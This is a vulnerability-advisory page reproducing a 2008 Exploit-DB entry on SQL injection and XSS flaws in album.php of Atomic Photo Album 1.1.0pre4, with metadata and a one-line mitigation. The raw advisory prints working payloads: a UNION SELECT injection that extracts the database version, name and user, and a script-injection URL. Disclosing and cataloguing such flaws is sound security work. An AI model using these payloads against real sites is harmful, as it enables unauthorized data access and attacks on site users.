Atomic Photo Album 1.1.0pre4 [album.php] - Multiple Remote Vulnerabilities

vendor:

Atomic Photo Album

by:

d3v1l

7.5

CVSS

HIGH

SQL Injection & XSS

89 (SQL Injection) & 79 (XSS)

CWE

Product Name: Atomic Photo Album

Affected Version From: 1.1.0pre4

Affected Version To: 1.1.0pre4

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Atomic Photo Album 1.1.0pre4 [album.php] – Multiple Remote Vulnerabilities

Atomic Photo Album 1.1.0pre4 is vulnerable to SQL Injection and XSS attacks. An attacker can inject malicious SQL queries to gain access to the database and execute arbitrary code on the vulnerable system. An attacker can also inject malicious JavaScript code to gain access to the vulnerable system.

Mitigation:

Input validation and output encoding should be used to prevent SQL Injection and XSS attacks.

Source

Exploit-DB raw data:

[~]-----------------------------------------------------------------------
[~] Atomic Photo Album 1.1.0pre4 [album.php] - Multiple Remote Vulnerabilities
[~]
[~] http://atomicpa.sourceforge.net
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 25.09.2008
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig       AND      milw0rm staff
[~]-------------------------------------------------------------
[~] Exploit :- SQL Injection
[~]
[~] http://site.com/album.php?apa_album_ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/*
[~]
[~] Demo :-
[~]
[~] http://www.site.com/new/fotos/album.php?apa_album_ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/*
[~]
[~]---------------------------------------------------------------------------------------------------------------------------
[~]
[~] Exploit :- XSS (cross site scripting)
[~]
[~] http://site.com/album.php?apa_album_ID=>'><script>alert(1337)</script>.
[~]
[~] Demo :-
[~]
[~] http://www.site.com/new/fotos/album.php?apa_album_ID=>'><script>alert(1337)</script>.
[~]
[~]----------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-09-25]